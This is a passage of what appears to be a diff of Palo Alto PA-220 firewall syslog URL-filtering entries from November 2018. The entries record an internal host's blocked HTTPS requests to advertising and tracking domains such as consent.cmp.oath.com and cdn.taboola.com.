States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28455,1,53150,443,20661,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7804,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28585,1,53185,443,65438,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7805,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28462,1,53187,443,53101,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7806,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:29 PA-220 1,2018/11/30 16:45:28,012801096514,THREAT,url,2049,2018/11/30 16:45:28,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:28,28839,1,53188,443,35463,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7807,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:30 PA-220 1,2018/11/30 16:45:29,012801096514,THREAT,url,2049,2018/11/30 16:45:29,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:29,28400,1,53178,443,45769,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7808,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,"b.scorecardresearch.com/",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,"cdn.taboola.com/",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,"rules.quantcount.com/",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, +Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 